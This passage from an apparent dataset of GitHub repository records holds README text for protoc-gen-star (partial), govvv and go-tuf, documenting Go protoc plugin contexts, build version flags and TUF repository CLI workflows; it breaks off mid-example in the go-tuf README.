`Generator` are initialized with an instance of `BuildContext` that encapsulates contextual paths, debugging, and parameter information.\n\n### Output Paths\n\nThe `BuildContext's` `OutputPath` method returns the output directory that the PG* plugin is targeting. This path is also initially `.` but refers to the directory in which `protoc` is executed. This default behavior can be overridden by providing an `output_path` in the flag.\n\nThe `OutputPath` can be used to create file names for `Artifacts`, using `JoinPath(name ...string)` which is essentially an alias for `filepath.Join(ctx.OutputPath(), name...)`. Manually tracking directories relative to the `OutputPath` can be tedious, especially if the names are dynamic. Instead, a `BuildContext` can manage these, via `PushDir` and `PopDir`.\n\n```go\nctx.OutputPath() // foo\nctx.JoinPath(\"fizz\", \"buzz.go\") // foo/fizz/buzz.go\n\nctx = ctx.PushDir(\"bar/baz\")\nctx.OutputPath() // foo/bar/baz\nctx.JoinPath(\"quux.go\") // foo/bar/baz/quux.go\n\nctx = ctx.PopDir()\nctx.OutputPath() // foo\n```\n\n`ModuleBase` wraps these methods to mutate their underlying `BuildContexts`. Those methods should be used instead of the ones on the contained `BuildContext` directly.\n\n### Debugging\n\nThe `BuildContext` exposes a `DebuggerCommon` interface which provides utilities for logging, error checking, and assertions. `Log` and the formatted `Logf` print messages to `os.Stderr`, typically prefixed with the `Module` name. `Debug` and `Debugf` behave the same, but only print if enabled via the `DebugMode` or `DebugEnv` `InitOptions`.\n\n`Fail` and `Failf` immediately stops execution of the protoc-plugin and causes `protoc` to fail generation with the provided message. `CheckErr` and `Assert` also fail with the provided messages if an error is passed in or if an expression evaluates to false, respectively.\n\nAdditional contextual prefixes can be provided by calling `Push` and `Pop` on the `BuildContext`. This behavior is similar to `PushDir` and `PopDir` but only impacts log messages. `ModuleBase` wraps these methods to mutate their underlying `BuildContexts`. Those methods should be used instead of the ones on the contained `BuildContext` directly.\n\n### Parameters\n\nThe `BuildContext` also provides access to the pre-processed `Parameters` from the specified protoc flag. The only PG*-specific key expected is \"output_path\", which is utilized by a module's `BuildContext` for its `OutputPath`.\n\nPG* permits mutating the `Parameters` via the `MutateParams` `InitOption`. By passing in a `ParamMutator` function here, these KV pairs can be modified or verified prior to the PGG workflow begins.\n\n## Language-Specific Subpackages\n\nWhile implemented in Go, PG* seeks to be language agnostic in what it can do. Therefore, beyond the pre-generated base descriptor types, PG* has no dependencies on the protoc-gen-go (PGG) package. However, there are many nuances that each language's protoc-plugin introduce that can be generalized. For instance, PGG package naming, import paths, and output paths are a complex interaction of the proto package name, the `go_package` file option, and parameters passed to protoc. While PG*'s core API should not be overloaded with many language-specific methods, subpackages can be provided that can operate on `Parameters` and `Entities` to derive the appropriate results.\n\nPG* currently implements the [pgsgo](https://godoc.org/github.com/lyft/protoc-gen-star/v2/lang/go/)\u00a0subpackage to provide these utilities to plugins targeting the Go language. Future subpackages are planned to support a variety of languages.\n\n## PG* Development & Make Targets\n\nPG* seeks to provide all the tools necessary to rapidly and ergonomically extend and build on top of the Protocol Buffer IDL. Whether the goal is to modify the official protoc-gen-go output or create entirely new files and packages, this library should offer a user-friendly wrapper around the complexities of the PB descriptors and the protoc-plugin workflow.\n\n### Setup\n\nFor developing on PG*, you should install the package within the `GOPATH`. PG* uses [glide][glide] for dependency management.\n\n```sh\ngo get -u github.com/lyft/protoc-gen-star\ncd $GOPATH/src/github.com/lyft/protoc-gen-star\nmake vendor\n```\n\nTo upgrade dependencies, please make the necessary modifications in `glide.yaml` and run `glide update`.\n\n### Linting & Static Analysis\n\nTo avoid style nits and also to enforce some best practices for Go packages, PG* requires passing `golint`, `go vet`, and `go fmt -s` for all code changes.\n\n```sh\nmake lint\n```\n\n### Testing\n\nPG* strives to have near 100% code coverage by unit tests. Most unit tests are run in parallel to catch potential race conditions. There are three ways of running unit tests, each taking longer than the next but providing more insight into test coverage:\n\n```sh\n# run code generation for the data used by the tests\nmake testdata\n\n# run unit tests without race detection or code coverage reporting\nmake quick\n\n# run unit tests with race detection and code coverage\nmake tests\n\n# run unit tests with race detection and generates a code coverage report, opening in a browser\nmake cover\n```\n\n#### protoc-gen-debug\n\nPG* comes with a specialized protoc-plugin, `protoc-gen-debug`. This plugin captures the CodeGeneratorRequest from a protoc execution and saves the serialized PB to disk. These files can be used as inputs to prevent calling protoc from tests.\n\n### Documentation\n\nGo is a self-documenting language, and provides a built in utility to view locally: `godoc`. The following command starts a godoc server and opens a browser window to this package's documentation. If you see a 404 or unavailable page initially, just refresh.\n\n```sh\nmake docs\n```\n\n### Demo\n\nPG* comes with a \"kitchen sink\" example: [`protoc-gen-example`][pge]. This protoc plugin built on top of PG* prints out the target package's AST as a tree to stderr. This provides an end-to-end way of validating each of the nuanced types and nesting in PB descriptors:\n\n```sh\n# create the example PG*-based plugin\nmake bin/protoc-gen-example\n\n# run protoc-gen-example against the demo protos\nmake testdata/generated\n```\n\n#### CI\n\nPG* uses [TravisCI][travis] to validate all code changes. Please view the [configuration][travis.yml] for what tests are involved in the validation.\n\n[glide]: http://glide.sh\n[pgg]: https://github.com/golang/protobuf/tree/master/protoc-gen-go\n[pge]: https://github.com/lyft/protoc-gen-star/tree/master/testdata/protoc-gen-example\n[travis]: https://travis-ci.com/lyft/protoc-gen-star\n[travis.yml]: https://github.com/lyft/protoc-gen-star/tree/master/.travis.yml\n[module]: https://github.com/lyft/protoc-gen-star/blob/master/module.go\n[pb]: https://developers.google.com/protocol-buffers/\n[context]: https://github.com/lyft/protoc-gen-star/tree/master/build_context.go\n[visitor]: https://github.com/lyft/protoc-gen-star/tree/master/node.go\n[params]: https://github.com/lyft/protoc-gen-star/tree/master/parameters.go\n[make]: https://github.com/lyft/protoc-gen-star/blob/master/Makefile\n[single]: https://github.com/golang/protobuf/pull/40\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ahmetb/govvv", "link": "https://github.com/ahmetb/govvv", "tags": ["go", "versioning"], "stars": 530, "description": "\"go build\" wrapper to add version info to Golang applications", "lang": "Go", "repo_lang": "", "readme": "# govvv\n\nThe simple Go binary versioning tool that wraps the `go build` command. \n\n![](https://cl.ly/0U2m441v392Q/intro-1.gif)\n\nStop worrying about `-ldflags` and **`go get github.com/ahmetb/govvv`** now.\n\n## Build Variables\n\n| Variable | Description | Example |\n|----------|-------------|---------|\n| **`main.GitCommit`** | short commit hash of source tree | `0b5ed7a` |\n| **`main.GitBranch`** | current branch name the code is built off | `master` |\n| **`main.GitState`** | whether there are uncommitted changes | `clean` or `dirty` | \n| **`main.GitSummary`** | output of `git describe --tags --dirty --always` | `v1.0.0`,
`v1.0.1-5-g585c78f-dirty`,
`fbd157c` |\n| **`main.BuildDate`** | RFC3339 formatted UTC date | `2016-08-04T18:07:54Z` |\n| **`main.Version`** | contents of `./VERSION` file, if exists, or the value passed via the `-version` option | `2.0.0` |\n\n## Using govvv is easy\n\nJust add the build variables you want to the `main` package and run:\n\n| old | :sparkles: new :sparkles: |\n| -------------|-----------------|\n| `go build` | `govvv build` |\n| `go install` | `govvv install` | \n\n## Version your app with govvv\n\nCreate a `VERSION` file in your build root directory and add a `Version`\nvariable to your `main` package.\n\n![](https://cl.ly/3Q1K1R2D3b2K/intro-2.gif)\n\nDo you have your own way of specifying `Version`? No problem:\n\n## govvv lets you specify custom `-ldflags`\n\nYour existing `-ldflags` argument will still be preserved:\n\n govvv build -ldflags \"-X main.BuildNumber=$buildnum\" myapp\n\nand the `-ldflags` constructed by govvv will be appended to your flag.\n\n## Don\u2019t want to depend on `govvv`? It\u2019s fine!\n\nYou can just pass a `-print` argument and `govvv` will just print the\n`go build` command with `-ldflags` for you and will not execute the go tool:\n\n $ govvv build -print\n go build \\\n\t -ldflags \\\n\t \"-X main.GitCommit=57b9870 -X main.GitBranch=dry-run -X main.GitState=dirty -X main.Version=0.1.0 -X main.BuildDate=2016-08-08T20:50:21Z\"\n\nStill don\u2019t want to wrap the `go` tool? Well, try `-flags` to retrieve the LDFLAGS govvv prepares:\n\n $ go build -ldflags=\"$(govvv -flags)\"\n\n## Want to use a different package?\n\nYou can pass a `-pkg` argument with the full package name, and `govvv` will \nset the build variables in that package instead of `main`. For example:\n\n```\n# build with govvv\n$ govvv build -pkg github.com/myacct/myproj/mypkg\n\n# build with go\n$ go build -ldflags=\"$(govvv -flags -pkg $(go list ./mypkg))\"\n```\n## Want to use a different version?\n\nYou can pass a `-version` argument with the desired version, and `govvv` will \nuse the specified version instead of obtaining it from the `./VERSION` file.\nFor example:\n\n```\n# build with govvv\n$ govvv build -version 1.2.3\n\n# build with go\n$ go build -ldflags=\"$(govvv -flags -version 1.2.3)\"\n```\n\n## Try govvv today\n\n $ go get github.com/ahmetb/govvv\n\n------\n\ngovvv is distributed under [Apache 2.0 License](LICENSE).\n\nCopyright 2016 Ahmet Alp Balkan \n\n------\n\n[![Build Status](https://travis-ci.org/ahmetb/govvv.svg?branch=master)](https://travis-ci.org/ahmetb/govvv)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "theupdateframework/go-tuf", "link": "https://github.com/theupdateframework/go-tuf", "tags": ["go", "golang", "security", "supply-chain", "tuf", "hacktoberfest"], "stars": 530, "description": "Go implementation of The Update Framework (TUF)", "lang": "Go", "repo_lang": "", "readme": "# go-tuf\n\n[![build](https://github.com/theupdateframework/go-tuf/workflows/build/badge.svg)](https://github.com/theupdateframework/go-tuf/actions?query=workflow%3Abuild) [![Coverage Status](https://coveralls.io/repos/github/theupdateframework/go-tuf/badge.svg)](https://coveralls.io/github/theupdateframework/go-tuf) [![PkgGoDev](https://pkg.go.dev/badge/github.com/theupdateframework/go-tuf)](https://pkg.go.dev/github.com/theupdateframework/go-tuf) [![Go Report Card](https://goreportcard.com/badge/github.com/theupdateframework/go-tuf)](https://goreportcard.com/report/github.com/theupdateframework/go-tuf)\n\nThis is a Go implementation of [The Update Framework (TUF)](http://theupdateframework.com/),\na framework for securing software update systems.\n\n## Directory layout\n\nA TUF repository has the following directory layout:\n\n```bash\n.\n\u251c\u2500\u2500 keys\n\u251c\u2500\u2500 repository\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 targets\n\u2514\u2500\u2500 staged\n \u00a0\u00a0 \u2514\u2500\u2500 targets\n```\n\nThe directories contain the following files:\n\n- `keys/` - signing keys (optionally encrypted) with filename pattern `ROLE.json`\n- `repository/` - signed metadata files\n- `repository/targets/` - hashed target files\n- `staged/` - either signed, unsigned or partially signed metadata files\n- `staged/targets/` - unhashed target files\n\n## CLI\n\n`go-tuf` provides a CLI for managing a local TUF repository.\n\n### Install\n\n`go-tuf` is tested on Go versions 1.18.\n\n```bash\ngo get github.com/theupdateframework/go-tuf/cmd/tuf\n```\n\n### Commands\n\n#### `tuf init [--consistent-snapshot=false]`\n\nInitializes a new repository.\n\nThis is only required if the repository should not generate consistent\nsnapshots (i.e. by passing `--consistent-snapshot=false`). If consistent\nsnapshots should be generated, the repository will be implicitly\ninitialized to do so when generating keys.\n\n#### `tuf gen-key [--expires=] `\n\nPrompts the user for an encryption passphrase (unless the\n`--insecure-plaintext` flag is set), then generates a new signing key and\nwrites it to the relevant key file in the `keys` directory. It also stages\nthe addition of the new key to the `root` metadata file. Alternatively, passphrases\ncan be set via environment variables in the form of `TUF_{{ROLE}}_PASSPHRASE`\n\n#### `tuf revoke-key [--expires=] `\n\nRevoke a signing key\n\nThe key will be removed from the root metadata file, but the key will remain in the\n\"keys\" directory if present.\n\n#### `tuf add [...]`\n\nHashes files in the `staged/targets` directory at the given path(s), then\nupdates and stages the `targets` metadata file. Specifying no paths hashes all\nfiles in the `staged/targets` directory.\n\n#### `tuf remove [...]`\n\nStages the removal of files with the given path(s) from the `targets` metadata file\n(they get removed from the filesystem when the change is committed). Specifying\nno paths removes all files from the `targets` metadata file.\n\n#### `tuf snapshot [--expires=]`\n\nExpects a staged, fully signed `targets` metadata file and stages an appropriate\n`snapshot` metadata file. Optionally one can set number of days after which\nthe `snapshot` metadata will expire.\n\n#### `tuf timestamp [--expires=]`\n\nStages an appropriate `timestamp` metadata file. If a `snapshot` metadata file is staged,\nit must be fully signed. Optionally one can set number of days after which\nthe timestamp metadata will expire.\n\n#### `tuf sign `\n\nSigns the given role's staged metadata file with all keys present in the `keys`\ndirectory for that role.\n\n#### `tuf commit`\n\nVerifies that all staged changes contain the correct information and are signed\nto the correct threshold, then moves the staged files into the `repository`\ndirectory. It also removes any target files which are not in the `targets`\nmetadata file.\n\n#### `tuf regenerate [--consistent-snapshot=false]`\n\nNote: Not supported yet\n\nRecreates the `targets` metadata file based on the files in `repository/targets`.\n\n#### `tuf clean`\n\nRemoves all staged metadata files and targets.\n\n#### `tuf root-keys`\n\nOutputs a JSON serialized array of root keys to STDOUT. The resulting JSON\nshould be distributed to clients for performing initial updates.\n\n#### `tuf set-threshold `\n\nSets `role`'s threshold (required number of keys for signing) to\n`threshold`.\n\n#### `tuf get-threshold `\n\nOutputs `role`'s threshold (required number of keys for signing).\n\n#### `tuf change-passphrase `\n\nChanges the passphrase for given role keys file. The CLI supports reading\nboth the existing and the new passphrase via the following environment\nvariables - `TUF_{{ROLE}}_PASSPHRASE` and respectively `TUF_NEW_{{ROLE}}_PASSPHRASE`\n\n#### `tuf payload `\n\nOutputs the metadata file for a role in a ready-to-sign (canonicalized) format.\n\nSee also `tuf sign-payload` and `tuf add-signatures`.\n\n#### `tuf sign-payload --role= `\n\nSign a file (outside of the TUF repo) using keys (in the TUF keys database,\ntypically produced by `tuf gen-key`) for the given `role` (from the TUF repo).\n\nTypically, `path` will be a file containing the output of `tuf payload`.\n\nSee also `tuf add-signatures`.\n\n#### `tuf add-signatures --signatures `\n\n\nAdds signatures (the output of `tuf sign-payload`) to the given role metadata file.\n\nIf the signature does not verify, it will not be added.\n\n#### `tuf status --valid-at `\n\nCheck if the role's metadata will be expired on the given date. \n\n#### Usage of environment variables\n\nThe `tuf` CLI supports receiving passphrases via environment variables in\nthe form of `TUF_{{ROLE}}_PASSPHRASE` for existing ones and\n`TUF_NEW_{{ROLE}}_PASSPHRASE` for setting new ones.\n\nFor a list of supported commands, run `tuf help` from the command line.\n\n### Examples\n\nThe following are example workflows for managing a TUF repository with the CLI.\n\nThe `tree` commands do not need to be run, but their output serve as an\nillustration of what files should exist after performing certain commands.\n\nAlthough only two machines are referenced (i.e. the \"root\" and \"repo\" boxes),\nthe workflows can be trivially extended to many signing machines by copying\nstaged changes and signing on each machine in turn before finally committing.\n\nSome key IDs are truncated for illustrative purposes.\n\n#### Create signed root metadata file\n\nGenerate a root key on the root box:\n\n```bash\n$ tuf gen-key root\nEnter root keys passphrase:\nRepeat root keys passphrase:\nGenerated root key with ID 184b133f\n\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 root.json\n\u251c\u2500\u2500 repository\n\u2514\u2500\u2500 staged\n \u251c\u2500\u2500 root.json\n \u2514\u2500\u2500 targets\n```\n\nCopy `staged/root.json` from the root box to the repo box and generate targets,\nsnapshot and timestamp keys:\n\n```bash\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u251c\u2500\u2500 repository\n\u2514\u2500\u2500 staged\n \u251c\u2500\u2500 root.json\n \u2514\u2500\u2500 targets\n\n$ tuf gen-key targets\nEnter targets keys passphrase:\nRepeat targets keys passphrase:\nGenerated targets key with ID 8cf4810c\n\n$ tuf gen-key snapshot\nEnter snapshot keys passphrase:\nRepeat snapshot keys passphrase:\nGenerated snapshot key with ID 3e070e53\n\n$ tuf gen-key timestamp\nEnter timestamp keys passphrase:\nRepeat timestamp keys passphrase:\nGenerated timestamp key with ID a3768063\n\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2514\u2500\u2500 staged\n \u251c\u2500\u2500 root.json\n \u2514\u2500\u2500 targets\n```\n\nCopy `staged/root.json` from the repo box back to the root box and sign it:\n\n```bash\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 root.json\n\u251c\u2500\u2500 repository\n\u2514\u2500\u2500 staged\n \u251c\u2500\u2500 root.json\n \u2514\u2500\u2500 targets\n\n$ tuf sign root.json\nEnter root keys passphrase:\n```\n\nThe staged `root.json` can now be copied back to the repo box ready to be\ncommitted alongside other metadata files.\n\n#### Alternate signing flow\n\nInstead of manually copying `root.json` into the TUF repository on the root box,\nyou can use the `tuf payload`, `tuf sign-payload`, `tuf add-signatures` flow.\n\nOn the repo box, get the `root.json` payload in a canonical format:\n\n``` bash\n$ tuf payload root.json > root.json.payload\n```\n\nCopy `root.json.payload` to the root box and sign it:\n\n\n``` bash\n$ tuf sign-payload --role=root root.json.payload > root.json.sigs\nEnter root keys passphrase:\n```\n\nCopy `root.json.sigs` back to the repo box and import the signatures:\n\n``` bash\n$ tuf add-signatures --signatures root.json.sigs root.json\n```\n\nThis achieves the same state as the above flow for the repo box:\n\n```bash\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2514\u2500\u2500 staged\n \u251c\u2500\u2500 root.json\n \u2514\u2500\u2500 targets\n```\n\n#### Add a target file\n\nAssuming a staged, signed `root` metadata file and the file to add exists at\n`staged/targets/foo/bar/baz.txt`:\n\n```bash\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2514\u2500\u2500 staged\n \u00a0\u00a0 \u251c\u2500\u2500 root.json\n \u2514\u2500\u2500 targets\n \u2514\u2500\u2500 foo\n \u2514\u2500\u2500 bar\n \u2514\u2500\u2500 baz.txt\n\n$ tuf add foo/bar/baz.txt\nEnter targets keys passphrase:\n\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2514\u2500\u2500 staged\n \u00a0\u00a0 \u251c\u2500\u2500 root.json\n \u251c\u2500\u2500 targets\n \u2502\u00a0\u00a0 \u2514\u2500\u2500 foo\n \u2502\u00a0\u00a0 \u2514\u2500\u2500 bar\n \u2502\u00a0\u00a0 \u2514\u2500\u2500 baz.txt\n \u2514\u2500\u2500 targets.json\n\n$ tuf snapshot\nEnter snapshot keys passphrase:\n\n$ tuf timestamp\nEnter timestamp keys passphrase:\n\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2514\u2500\u2500 staged\n \u00a0\u00a0 \u251c\u2500\u2500 root.json\n \u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n \u251c\u2500\u2500 targets\n \u2502\u00a0\u00a0 \u2514\u2500\u2500 foo\n \u2502\u00a0\u00a0 \u2514\u2500\u2500 bar\n \u2502\u00a0\u00a0 \u2514\u2500\u2500 baz.txt\n \u00a0\u00a0 \u251c\u2500\u2500 targets.json\n \u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\n$ tuf commit\n\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 root.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 foo\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 bar\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 baz.txt\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u2514\u2500\u2500 staged\n```\n\n#### Remove a target file\n\nAssuming the file to remove is at `repository/targets/foo/bar/baz.txt`:\n\n```bash\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 root.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 foo\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 bar\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 baz.txt\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u2514\u2500\u2500 staged\n\n$ tuf remove foo/bar/baz.txt\nEnter targets keys passphrase:\n\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 root.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 foo\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 bar\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 baz.txt\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u2514\u2500\u2500 staged\n \u2514\u2500\u2500 targets.json\n\n$ tuf snapshot\nEnter snapshot keys passphrase:\n\n$ tuf timestamp\nEnter timestamp keys passphrase:\n\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 root.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 foo\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 bar\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 baz.txt\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u2514\u2500\u2500 staged\n \u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n \u00a0\u00a0 \u251c\u2500\u2500 targets.json\n \u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\n$ tuf commit\n\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 root.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u2514\u2500\u2500 staged\n```\n\n#### Regenerate metadata files based on targets tree (Note: Not supported yet)\n\n```bash\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 root.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 foo\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 bar\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 baz.txt\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u2514\u2500\u2500 staged\n\n$ tuf regenerate\nEnter targets keys passphrase:\n\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 root.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 foo\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 bar\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 baz.txt\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u2514\u2500\u2500 staged\n \u2514\u2500\u2500 targets.json\n\n$ tuf snapshot\nEnter snapshot keys passphrase:\n\n$ tuf timestamp\nEnter timestamp keys passphrase:\n\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 root.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 foo\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 bar\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 baz.txt\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u2514\u2500\u2500 staged\n \u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n \u00a0\u00a0 \u251c\u2500\u2500 targets.json\n \u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\n$ tuf commit\n\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 root.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 foo\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 bar\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 baz.txt\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u2514\u2500\u2500 staged\n```\n\n#### Update timestamp.json\n\n```bash\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 root.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 foo\n\u2502\u00a0\u00a0 